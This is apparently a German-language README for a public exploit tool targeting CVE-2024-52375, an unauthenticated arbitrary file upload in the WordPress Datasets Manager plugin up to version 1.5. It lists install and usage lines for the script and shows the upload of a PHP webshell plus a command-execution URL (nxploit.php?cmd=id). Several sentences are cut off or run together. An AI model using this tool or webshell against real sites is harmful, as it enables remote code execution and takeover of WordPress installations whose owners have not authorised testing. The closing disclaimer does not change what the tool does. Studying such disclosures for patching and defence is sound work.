
WordPress Datasets Manager von Arttia Creative Plugin <= 1.5 – Schwachstelle für beliebigen Datei-Upload
💥 Exploit von: Nxploit (Khaled Alenazi)
📅 CVE veröffentlicht: 14. November 2024
🧠 CVSS-Score: 10.0 (Kritisch)
🛠 CWE-434: Uneingeschränkter Upload von Dateien mit gefährlichem Typ
Eine kritische Schwachstelle wurde im Datasets Manager by Arttia Creative WordPress-Plugin entdeckt, das alle Versionen bis einschließlich 1.5 betrifft.
Das Plugin validiert die Dateitypen beim Upload-Prozess nicht ordnungsgemäß, sodass ein nicht authentifizierter Angreifer beliebige Dateien – einschließlich PHP-Shells – hochladen und eine Remote Code Execution (RCE) erreichen kann.
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests-Bibliothek:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Ersetzen Sie die URL durch den vollständigen Pfad zur Ziel-WordPress-Installation.
Bei Erfolg führt das Skript Folgendes aus:
_wpnonce aus dem Frontend.nxploit.php hoch.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
Sie können dann Befehle wie den folgenden ausführen:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 verwundbar.Dieses Tool wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt.
Die Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testgenehmigung haben, ist illegal.